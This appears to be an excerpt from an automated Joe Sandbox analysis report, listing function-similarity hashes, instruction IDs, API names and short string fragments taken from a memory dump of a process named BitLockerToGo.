                                                                                • Instruction Fuzzy Hash: 8D213732D082146BC3249F19C48053BF7E4EB9E704F46962FE8C497395E3399C2887E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7021dfcba022c7c25580cd96da602261b1d025491482a130772f10e277436ddd
                                                                                • Instruction ID: c3a11dea21b93880c2bec0f3fccfcb0e7c0b1a976f9849203437204c26301c92
                                                                                • Opcode Fuzzy Hash: 7021dfcba022c7c25580cd96da602261b1d025491482a130772f10e277436ddd
                                                                                • Instruction Fuzzy Hash: F431ECB060D2009BE7149F19D980627B7E1EFC4319F19493EEA9AAB3D1D339DC42C74A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31f0b12cb33696002d6a537a347f99650f8a1caeb8ca5ab4dcd4fbba958a8fa1
                                                                                • Instruction ID: 74112649e7d93137a0cb14cc095c8dc1235c87363cb483240c27c9a1451a6a02
                                                                                • Opcode Fuzzy Hash: 31f0b12cb33696002d6a537a347f99650f8a1caeb8ca5ab4dcd4fbba958a8fa1
                                                                                • Instruction Fuzzy Hash: 6621AF74A00215DBCF00CF94D9D19AFB7B1FF0A314B904169E941AB3A1E3389D45CB69
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                • Instruction ID: dde22403d6744a3900b34784c932ed46ac96bc62e90eb16de623c369c45dfb0c
                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                • Instruction Fuzzy Hash: 44110673A041D80EC3168D3C8440765BFA34E97234F2953DAE5F89B2D6D7278D8A93A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4e4373c64a15e30cbc499ebfbe72e16d3e6d674ecb473181a36f4cad195d695
                                                                                • Instruction ID: 36e758956a55f9c5c11ebb7b96d557d00800cba918f7ae786cde8b7d7bb32b08
                                                                                • Opcode Fuzzy Hash: b4e4373c64a15e30cbc499ebfbe72e16d3e6d674ecb473181a36f4cad195d695
                                                                                • Instruction Fuzzy Hash: 7F0175F5B0030157D724BF56A4E1727B2A85F88708F18663ED80957346DB79FC05CAD9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a609698ddd97a65969a2e4c2976e0a84a4a62fb69de5fdfb15c75b1161379c6b
                                                                                • Instruction ID: 3a64693a716a7bb6d799a239aed4efa64f13b72749a984ec0944380185557190
                                                                                • Opcode Fuzzy Hash: a609698ddd97a65969a2e4c2976e0a84a4a62fb69de5fdfb15c75b1161379c6b
                                                                                • Instruction Fuzzy Hash: 40F0ECF570411067DB2289959CC0FB7BBACCB8B368F190416F84557242D1756C95C3EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                • Instruction ID: 5693cf3f988e29c11e876379024e78bb3f89d2661a8311d70cff87b3958a2d7d
                                                                                • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                • Instruction Fuzzy Hash: 76D05E21A0922246AB648E19A400977F7E4EAC7B51B49995FF582E3258D234DC81C2AD
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: %$%$%$-$1$3$9$:$;$;$=$?$A$C$E$E$G$I$J$K$L$M$O$_$_$d$v
                                                                                • API String ID: 2610073882-3468994831
                                                                                • Opcode ID: 3daa8f507907f839462dfa39eb420bde44c109fe08867309b26a0d00f417e6b4
                                                                                • Instruction ID: e9c7f1146032128724f9bdec031daba2a225aa60f9f3e315a0bdf175d789d0af
                                                                                • Opcode Fuzzy Hash: 3daa8f507907f839462dfa39eb420bde44c109fe08867309b26a0d00f417e6b4
                                                                                • Instruction Fuzzy Hash: E741C87010C3C0DEE352DB28C09875BBFE1AB96308F44599DE5D947382C7BA9649CB5B
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: AllocString
                                                                                • String ID: !$"$#$#$'$($($0$4$9$=$@$@$G$T$X$a$c$g$q$s$u$w$y${$}
                                                                                • API String ID: 2525500382-432418991
                                                                                • Opcode ID: 055f4e05de53a28a97d7b61db737b0b64d5b3e3a791466188282ba4c649d95ca
                                                                                • Instruction ID: 9f388b386099813a24fdc584a8711f8671c1a8d4ca6d4d3bfda74d394ad693ea
                                                                                • Opcode Fuzzy Hash: 055f4e05de53a28a97d7b61db737b0b64d5b3e3a791466188282ba4c649d95ca
                                                                                • Instruction Fuzzy Hash: 8CA15F7050CBC1CAD3328A2C98487DABFD16BAB324F484B9DE4ED4A2E2C7754146C767
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: i$k$m$n$o$q$s$u$w$y${$}
                                                                                • API String ID: 2610073882-434376181
                                                                                • Opcode ID: a77d44d7207b62bf3763f28adf2973eafd3e1ef1eacc2f09b76565d718051be0
                                                                                • Instruction ID: ecf7aa1ba93f11b931c4b017102072dc6f9a5f92655033f76003445eb29e414e
                                                                                • Opcode Fuzzy Hash: a77d44d7207b62bf3763f28adf2973eafd3e1ef1eacc2f09b76565d718051be0
                                                                                • Instruction Fuzzy Hash: 4C41E32450D7C1CEE371DB288848B9EBFD26BA6224F184A9DD4ED4B3D2CB795049C763
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitVariant
                                                                                • String ID: @$@$E$K$R$Y$c$c$p$x$|
                                                                                • API String ID: 1927566239-2099116840
                                                                                • Opcode ID: 426eb7dc079c400172ce8bcf8d12a27ad94d6feb782ba49786e064d385da1be3
                                                                                • Instruction ID: b12030f24b8e78c2a73ac03f9e99b91eb4c424fd9d57ec5d8587879669f5671a
                                                                                • Opcode Fuzzy Hash: 426eb7dc079c400172ce8bcf8d12a27ad94d6feb782ba49786e064d385da1be3
                                                                                • Instruction Fuzzy Hash: 2941E16010C7C1CED362DB28949875BBFE0AFA6228F584A4DF0E85B3D2C7799505CB67
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitVariant
                                                                                • String ID: @$@$E$K$R$Y$c$c$p$x$|
                                                                                • API String ID: 1927566239-2099116840
                                                                                • Opcode ID: 8d3988a134aff82abaffb864f758e2f5f40d4437aff6175adb62cd310acdddf6
                                                                                • Instruction ID: d30c8e658de2a8e7b200eddcfa233859c6d20831a6f90ca12c34b24fcd39450d
                                                                                • Opcode Fuzzy Hash: 8d3988a134aff82abaffb864f758e2f5f40d4437aff6175adb62cd310acdddf6
                                                                                • Instruction Fuzzy Hash: 5441D37410C7C1CED321DB28949874ABFE06FAA228F480A8DF1E85B2D2C3759505CB67
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: !$)$4$5$:$S$u$v$w
                                                                                • API String ID: 2610073882-1934825185
                                                                                • Opcode ID: 06f9d2fee9d34c107782edff0bb0b0e2011f785913a47f806bd2ce1dc3e36627
                                                                                • Instruction ID: 0f120a937187d79d8767381d2f8fd6867be001f0cf99e9ab3928262e0b07fd64
                                                                                • Opcode Fuzzy Hash: 06f9d2fee9d34c107782edff0bb0b0e2011f785913a47f806bd2ce1dc3e36627
                                                                                • Instruction Fuzzy Hash: B841B32014C7C6CED332CA28C448BAEBFD06BA6264F088EADD0EA5A6D2D3755445D767
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: .$1$k$l$v$z
                                                                                • API String ID: 2610073882-3405225686
                                                                                • Opcode ID: 6cb15e98699db120211ec7808f161d22fee2e421fed54cc1ac1a4d858ec00f32
                                                                                • Instruction ID: 24f2675c95bc9c42a0cfd94f3c60aecfa22dde20c39f5de747ca3bf39958b4f7
                                                                                • Opcode Fuzzy Hash: 6cb15e98699db120211ec7808f161d22fee2e421fed54cc1ac1a4d858ec00f32
                                                                                • Instruction Fuzzy Hash: 4D31902410D7C1CEE3329B688958B9EBFE16FD6224F084B9DD4E94B2D2C7B55445CB23
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: #$+$0$5$<$?
                                                                                • API String ID: 2568140703-1474803392
                                                                                • Opcode ID: 8cc688ed6792fe88fea4fc47e62f6dde1bcfe798667701542d6c037ca773dea4
                                                                                • Instruction ID: 07fc8111defc27ae49d79230bef23680b6313b5502691f1b37ba41c954f9577d
                                                                                • Opcode Fuzzy Hash: 8cc688ed6792fe88fea4fc47e62f6dde1bcfe798667701542d6c037ca773dea4
                                                                                • Instruction Fuzzy Hash: A961D772A097508FC3299F2CC45035EBBE29BD9324F1A8A2DD5E9C73D1DA398842C746
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID: #$+$0$5$<$?
                                                                                • API String ID: 2568140703-1474803392
                                                                                • Opcode ID: 1ee41aa9a3fe2d67bce96b0d3f5bc8fbfe8f58c10a396114396c0f9200eddb8d
                                                                                • Instruction ID: 3370ecbb4f06aa56e6e429b7051654f41c76f23f79daf93a791cdd7eceeda512
                                                                                • Opcode Fuzzy Hash: 1ee41aa9a3fe2d67bce96b0d3f5bc8fbfe8f58c10a396114396c0f9200eddb8d
                                                                                • Instruction Fuzzy Hash: 7261C831A087508FC7299B2CC4503AEB7E1AFDA324F194A2DE5EAC73D1DA798841C746
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitVariant
                                                                                • String ID: I$U$V$V$_$l
                                                                                • API String ID: 1927566239-1408917838
                                                                                • Opcode ID: f7a1f9fffd33309d79f9820d7441561431d5559c734cc87c434eb70e92c9d6fc
                                                                                • Instruction ID: a66eb5c4b7bacd560bc1acf274e01c3fc4d0360296ba44bd2bf7dae8427709c0
                                                                                • Opcode Fuzzy Hash: f7a1f9fffd33309d79f9820d7441561431d5559c734cc87c434eb70e92c9d6fc
                                                                                • Instruction Fuzzy Hash: FB41E27400C7C1CEE335DB288454BDBBBE0ABA6314F048E9DE4E887292D7B58549CB63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: E#A%$mp$tz$MC
                                                                                • API String ID: 0-3807287400
                                                                                • Opcode ID: 7c3dd5337c6f32316b80cf5bfda41dc84ff65b8190589ff731955a39c09e8316
                                                                                • Instruction ID: bcfdbecb234d170ffacd29dfbc3b3742555c7f9b57f5a54b673af9dfcac521db
                                                                                • Opcode Fuzzy Hash: 7c3dd5337c6f32316b80cf5bfda41dc84ff65b8190589ff731955a39c09e8316
                                                                                • Instruction Fuzzy Hash: F2F130B42093409BC310DF15E990A2FBBF4EF96B48F90491EF4898B251D778C905DBAB
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-3916222277
                                                                                • Opcode ID: 07c45d82cd2a4d26ba099d48f9d7a1ba9dc3da252903be6a4aca464c69f28734
                                                                                • Instruction ID: d99e9b1e65246302fa34940887c56263ac087aa1dab2bdd5eb6eb224507250fe
                                                                                • Opcode Fuzzy Hash: 07c45d82cd2a4d26ba099d48f9d7a1ba9dc3da252903be6a4aca464c69f28734
                                                                                • Instruction Fuzzy Hash: 99318EB4918304CFDB40EF69D98561EBBF0BB89314F11892DE488DB361D774A958CB86
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(37B83947,00000000,00000800), ref: 00445A92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: 0EBC$4I2G
                                                                                • API String ID: 1029625771-3264664664
                                                                                • Opcode ID: 0adbe995fed65a2ce40ef144f922a7654778ad2d322e22e308813fde99c26939
                                                                                • Instruction ID: f7da3d5c1dd0cb831bef03aa5834eaa96156b037ec8573f4ad63a2ce40f86aa4
                                                                                • Opcode Fuzzy Hash: 0adbe995fed65a2ce40ef144f922a7654778ad2d322e22e308813fde99c26939
                                                                                • Instruction Fuzzy Hash: 4B118B711083419FEB00EF18E880A1EBBE5AF85341F958C2DE1D497352D738CA85CF5A